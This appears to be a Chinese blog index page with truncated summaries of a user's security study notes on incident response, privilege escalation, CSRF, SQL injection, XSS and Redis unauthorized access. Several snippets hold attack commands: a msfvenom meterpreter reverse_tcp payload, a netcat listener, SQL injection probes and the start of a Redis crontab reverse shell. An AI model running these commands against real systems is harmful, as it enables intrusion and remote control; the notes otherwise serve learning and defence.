网安
kimojinmmp
这个作者很懒,什么都没留下…
展开
-
【我的收集】
1.Windows命令2.安全加固3.windows系统排查4.linux系统排查5.linux日志6.webshell特征7.FastJson反序列化8.分析,研判9.Shiro 550 反序列化10.Log4j11.挖矿木马查杀12.shiro权限绕过12.沙箱逃逸1. Windows日志:C:\Windows\System32\winevt\Logs 命令:Eventvwr.msc2.安全加固(1)禁用或者删除无用的账号,检查特殊账户(可远程登录、用户权限高的账号),必原创 2022-05-21 21:52:06 · 916 阅读 · 1 评论 -
烂土豆+令牌窃取提权
烂土豆+令牌窃取提权(win2008及之前可以直接使用令牌窃取提权)potato.exe:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-075/potato.exe# 1.生成shell上传到目标主机msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.106.150 LPORT=4433 -f exe -o 4433.exe# 2.开启msfu原创 2022-04-03 19:58:25 · 211 阅读 · 0 评论 -
Csrf攻击
1.Csrf原理:1.对目标网站增删改的地方进行标记,并观察其逻辑,判断请求是否可以被伪造,比如修改管理员账号时,并不需要验证旧密码,导致请求容易被伪造;v比如对于敏感信息的修改并没有使用安全的token验证,导致请求容易被伪造。2.确认凭证的有效期(这个问题会提高CSRF利用的概率)3.虽然退出或者关闭了浏览器,但cookie仍然有效,或者session并没有及时过期,导致CSRF攻击变的简单2.防御CSRF攻击:验证token:form 的最后加上 验证HTTP请求的Referer,还有验原创 2022-04-03 13:32:07 · 199 阅读 · 0 评论 -
sql注入
1.注入攻击原理是什么?如何找注入点?如何判断注入点?原理:通过构建特殊输入作为参数传入web应用程序,通过执行注入的sql语句来达到获取sql权限的目的。注入点:一切与数据库产生交互的操作都可能是注入点。判断注入点:1.搜索框或URL尾端加’如果报错则可能存在sql注入漏洞2.数字型判断是否有注入and 1=1//返回正确页面and 1=2//返回错误页面3.字符型判断是否有注入and ‘1’='1//返回正确页面and '1='2//返回错误页面2.注入分为几类及提交方式是什么原创 2022-04-03 13:39:30 · 1937 阅读 · 0 评论 -
XSS漏洞
1.反射型漏洞产生原因和攻击方式:原因:对用户的输入不经过滤直接回显到页面中。方式:通过构造url,当用户访问该url时会重定向到钓鱼网站,或者窃取用户的cookie、发送其他请求。2.Xss防御:1)HTML转义,转义后可以确保用户输入的内容在浏览器中作为文本显示,而不是作为代码解析。htmlspecialchars()是PHP里面把预定义的字符转换为HTML实体的函数2)验证用户输入,过滤特殊标签和指定字符。3)输入做过滤,输出做转义3.过滤绕过的思路前端限制绕过,直接抓包重放,或者修改原创 2022-04-03 13:41:05 · 1585 阅读 · 0 评论 -
redis未授权访问
1.漏洞成因Redis没有设置密码Redis protected-mode 设置为noRedis以高权限启动2.漏洞防御限制redis访问:修改redis.conf文件bind 127.0.0.1修改默认端口:修改redis.conf文件增加redis访问密码3.漏洞利用1.反弹shell利用条件:以root权限运行时,通过写crontab来执行命令,反弹shell1.开启任意监听端口:nc -nvlp 99992.set xxx “\n\n*/1 * * * * /bin/b原创 2022-04-03 13:44:32 · 2190 阅读 · 0 评论